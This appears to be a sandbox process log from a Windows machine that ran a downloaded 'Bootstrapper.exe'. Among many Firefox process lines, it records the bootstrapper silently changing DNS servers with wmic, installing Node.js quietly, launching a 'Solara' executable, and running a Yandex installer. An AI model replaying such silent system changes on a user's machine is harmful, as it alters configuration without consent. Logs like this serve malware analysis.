"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6180 -childID 7 -isForBrowser -prefsHandle 6172 -prefMapHandle 6168 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2bc999c-5eec-4ef8-bceb-92b91600621b} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6708 -childID 8 -isForBrowser -prefsHandle 6668 -prefMapHandle 6672 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4dc16b7-60b2-4326-9a49-39af8174a6bd} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7528 -childID 9 -isForBrowser -prefsHandle 7520 -prefMapHandle 7516 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d65bd01-715c-4c76-aee3-5f3692559640} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7676 -childID 10 -isForBrowser -prefsHandle 7720 -prefMapHandle 7528 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4d04d5b-fe15-448a-bb40-18da39f3195a} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 11 -isForBrowser -prefsHandle 7508 -prefMapHandle 7800 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00e5941f-00c9-485c-a930-241870d40cac} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7664 -childID 12 -isForBrowser -prefsHandle 4928 -prefMapHandle 4912 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8522355-1749-4315-b270-97156188e5a9} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8012 -childID 13 -isForBrowser -prefsHandle 7808 -prefMapHandle 6540 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {105a0c61-be7b-457b-9dc7-49ad3ff0a26f} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7828 -childID 14 -isForBrowser -prefsHandle 4764 -prefMapHandle 4692 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efd7b378-e2f7-4cad-892f-0e943785c4b6} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8144 -childID 15 -isForBrowser -prefsHandle 5704 -prefMapHandle 6356 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f229965a-074d-4930-9201-f13448a0d6cc} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6928 -childID 16 -isForBrowser -prefsHandle 6352 -prefMapHandle 1540 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fcd1c4c3-c607-4757-90b8-0b6e2996b537} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7816 -parentBuildID 20240401114208 -prefsHandle 7652 -prefMapHandle 5244 -prefsLen 30583 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b040ae28-d80e-447f-a1bb-da4a2d5b20d4} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8088 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 8096 -prefMapHandle 8112 -prefsLen 30583 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2fb4fb3-4f40-4014-a7bb-97ecd6eded97} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8308 -childID 17 -isForBrowser -prefsHandle 8284 -prefMapHandle 8296 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c12fdd75-d95e-42a3-ab0b-46be8323c7f3} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8440 -childID 18 -isForBrowser -prefsHandle 8448 -prefMapHandle 8452 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1ef06ee-8cc6-429e-b081-e77060b01695} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8496 -childID 19 -isForBrowser -prefsHandle 8696 -prefMapHandle 8700 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9e5359f-e655-4f20-9e8c-95b1fd4c787d} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8696 -childID 20 -isForBrowser -prefsHandle 8844 -prefMapHandle 8828 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9da8f564-43c7-4072-80ed-469e7061d09f} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8572 -childID 21 -isForBrowser -prefsHandle 8508 -prefMapHandle 8608 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6bb1e275-4e75-4e19-b5f4-11d11d0ac2c0} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9252 -childID 22 -isForBrowser -prefsHandle 8544 -prefMapHandle 8940 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3919fee8-f3d9-4023-b8e3-3437f4ac8dd0} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9368 -childID 23 -isForBrowser -prefsHandle 9304 -prefMapHandle 9292 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3794ab38-c792-44c2-b663-c00c44349987} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9588 -childID 24 -isForBrowser -prefsHandle 9576 -prefMapHandle 9152 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ed654c3-effa-4d1e-9f0f-f04e82b4003a} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9016 -childID 25 -isForBrowser -prefsHandle 9732 -prefMapHandle 9736 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22db67ca-b2c7-4932-8a6f-f35bc5b0091a} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9588 -childID 26 -isForBrowser -prefsHandle 8436 -prefMapHandle 8748 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5517d40-d0d3-4215-bf42-2a952f3c1974} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9788 -childID 27 -isForBrowser -prefsHandle 8712 -prefMapHandle 9208 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df8f741-9bf4-4108-8f25-618ad855b708} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9708 -childID 28 -isForBrowser -prefsHandle 9416 -prefMapHandle 8696 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61a63d50-0644-475f-a643-246f7496abaa} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9988 -childID 29 -isForBrowser -prefsHandle 8560 -prefMapHandle 9788 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {198e28ef-61e7-4af0-8a18-f0fd1811782d} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10700 -childID 30 -isForBrowser -prefsHandle 10620 -prefMapHandle 10612 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2966e926-b334-4292-bab9-3b00a88e4271} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10256 -childID 31 -isForBrowser -prefsHandle 8964 -prefMapHandle 9664 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8d1725c-9911-4e50-b43f-f933c6c00b3a} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10340 -childID 32 -isForBrowser -prefsHandle 9224 -prefMapHandle 10124 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87a5f4f3-51e3-4d7a-ad1d-f09342c37152} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Users\Admin\Downloads\Bootstrapper.exe
"C:\Users\Admin\Downloads\Bootstrapper.exe"
C:\Users\Admin\Downloads\BootstrapperV1.22.exe
"C:\Users\Admin\Downloads\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\Admin\Downloads\Bootstrapper.exe" --isUpdate true
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c ipconfig /all
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
C:\Windows\System32\Wbem\WMIC.exe
wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding A13A92B3C019F3DC9C8493D7BDB94CA6
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5B34581B1E730602D83A1F23063C4A91
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9024 -childID 33 -isForBrowser -prefsHandle 3120 -prefMapHandle 9072 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {343675fd-a725-4595-a4bf-4e25f12799e0} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11036 -childID 34 -isForBrowser -prefsHandle 10952 -prefMapHandle 10956 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {389c9e3b-6444-4e30-8db7-f612ff2a4fab} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11188 -childID 35 -isForBrowser -prefsHandle 10296 -prefMapHandle 10924 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eede9173-9049-4f31-a48c-f9bfc0bde884} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2A47860139A8AE6F14ABEFAB9BF42395 E Global\MSI0000
C:\Windows\SysWOW64\wevtutil.exe
"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
C:\Windows\System32\wevtutil.exe
"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10268 -childID 36 -isForBrowser -prefsHandle 9856 -prefMapHandle 9688 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89d6b9ef-aa37-49ef-a239-4a95a7874bd5} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\ProgramData\Solara\Solara.exe
"C:\ProgramData\Solara\Solara.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9744 -childID 37 -isForBrowser -prefsHandle 10604 -prefMapHandle 10272 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19816d45-8983-4012-81fa-d94460d1e775} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6204 -childID 38 -isForBrowser -prefsHandle 10764 -prefMapHandle 7896 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d26a222-f707-4f68-99a6-09bbbec6a6b1} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9156 -childID 39 -isForBrowser -prefsHandle 10808 -prefMapHandle 11224 -prefsLen 28088 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45d486da-e9c6-4a30-9e85-90d25ef48ce3} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9860 -childID 40 -isForBrowser -prefsHandle 11268 -prefMapHandle 9544 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8780cd35-df77-4d96-a2ad-af64d57e184f} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11268 -childID 41 -isForBrowser -prefsHandle 10980 -prefMapHandle 11556 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d4cdc09-c49d-4977-adb1-d96c9a8c159b} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11780 -childID 42 -isForBrowser -prefsHandle 10252 -prefMapHandle 8524 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {643c8423-7ea1-4d17-828f-027389a0ebc7} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11864 -childID 43 -isForBrowser -prefsHandle 11948 -prefMapHandle 11944 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb6fdaca-c990-4073-ba0e-45449ef8af7d} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12044 -childID 44 -isForBrowser -prefsHandle 12040 -prefMapHandle 12048 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd7c62e0-3d40-4b82-892b-ca1cb5caa5c7} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12320 -childID 45 -isForBrowser -prefsHandle 12300 -prefMapHandle 12216 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {904221d0-a228-4b0e-ad8a-c3f5ea2e11df} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12772 -childID 46 -isForBrowser -prefsHandle 12348 -prefMapHandle 12436 -prefsLen 28261 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3923cff4-6046-4eae-93cb-4f0260b09aa1} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8392 -childID 47 -isForBrowser -prefsHandle 8416 -prefMapHandle 8340 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a769c971-b192-4849-be5c-662ec1c72a29} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6352 -childID 48 -isForBrowser -prefsHandle 7040 -prefMapHandle 7568 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebc3631f-2ff0-4be4-a512-55a5d78f6f06} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12960 -childID 49 -isForBrowser -prefsHandle 11904 -prefMapHandle 10544 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {121b41b6-3f5e-467b-9257-5c79cea04069} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6224 -childID 50 -isForBrowser -prefsHandle 11024 -prefMapHandle 8968 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {836f1dc5-bdf8-4842-bbf8-ed27781f0483} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12968 -childID 51 -isForBrowser -prefsHandle 8464 -prefMapHandle 8468 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88d254b0-4991-4962-bcb5-d81a542cf074} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10884 -childID 52 -isForBrowser -prefsHandle 8484 -prefMapHandle 11612 -prefsLen 28303 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {678a6fec-279e-4889-85f7-8b84337925f4} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Users\Admin\Downloads\Yandex.exe
"C:\Users\Admin\Downloads\Yandex.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12048 -childID 53 -isForBrowser -prefsHandle 2552 -prefMapHandle 13144 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa412772-ef12-4302-8f9a-752ac1396760} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Users\Admin\Downloads\Yandex.exe
"C:\Users\Admin\Downloads\Yandex.exe" --parent-installer-process-id=9084 --run-as-admin --setup-cmd-line="fake_browser_arc --abt-config-resource-file=\"C:\Users\Admin\AppData\Local\Temp\abt_config_resource\" --abt-update-path=\"C:\Users\Admin\AppData\Local\Temp\e6404363-3454-42cd-9323-98912f84c8f0.tmp\" --brand-name=yandex --browser-present=none --distr-info-file=\"C:\Users\Admin\AppData\Local\Temp\distrib_info\" --installer-brand-id=yandex --installer-partner-id=switch-brand --make-browser-default-after-import --ok-button-pressed-time=1325425151 --progress-window=197254 --send-statistics --variations-update-path=\"C:\Users\Admin\AppData\Local\Temp\84179066-da1e-4621-aebe-a4ef4302eeff.tmp\" --verbose-logging"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8676 -childID 54 -isForBrowser -prefsHandle 8424 -prefMapHandle 8668 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8183ce51-e51c-44e5-a2ad-6cad34e6392e} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11092 -childID 55 -isForBrowser -prefsHandle 10948 -prefMapHandle 8868 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cd20809-7ba3-4d64-8942-35bfeade5106} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13660 -childID 56 -isForBrowser -prefsHandle 13612 -prefMapHandle 13272 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23a1841f-3cc8-4770-b32e-258d1dffd659} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12928 -childID 57 -isForBrowser -prefsHandle 11936 -prefMapHandle 13220 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c980d56-d242-4274-b52c-b443f6ff5cd9} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Users\Admin\AppData\Local\Temp\yb82DD.tmp
